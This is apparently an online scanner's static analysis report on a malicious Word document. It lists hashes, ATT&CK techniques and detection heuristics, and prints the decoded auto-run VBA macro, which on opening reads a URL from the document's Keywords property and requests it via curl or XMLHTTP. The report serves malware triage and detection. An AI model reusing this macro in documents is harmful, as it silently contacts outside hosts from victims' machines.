Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6d531826c0fa1d94…

MALICIOUS

Office (OOXML)

24.6 KB Created: 2016-04-22 12:15:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2019-04-18
MD5: ca9c131552672b413631203169693c3b SHA-1: b908b77b9602e3efc1a1fcf54ad205371148561c SHA-256: 6d531826c0fa1d941433913ec42ae7aec3f99bbd64fd474eb59e547fa596b40c
322 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an OOXML document containing VBA macros, specifically triggering AutoOpen and Workbook_Open heuristics. The document body contains a lure to enable macros, and the extracted VBA script uses CreateObject to instantiate Microsoft.XMLHTTP or system to execute 'curl' to download a payload from a URL stored in the document's Keywords property. This indicates a downloader functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 829 bytes
SHA-256: 5c7eb4cf5e68103ecece4d3179e77d60e5f0a799a7f236cb47fec5afe49d420d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Mac Then
    Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
#End If

Sub Auto_Open()
    Dim dp As Object
    Set dp = ActiveDocument.BuiltInDocumentProperties
    tracker = dp("KeyWords")
    
    #If Mac Then
        System ("curl " + tracker)
    #Else
        Dim req: Set req = CreateObject("Microsoft.XMLHTTP")
        req.Open "GET", tracker, False
        req.Send
    #End If
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 8704 bytes
SHA-256: fc0d3d775df65fd2fbb19ddb1094a51080ddfa3167d0b5b7f59cc9d7a09b3a6a
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.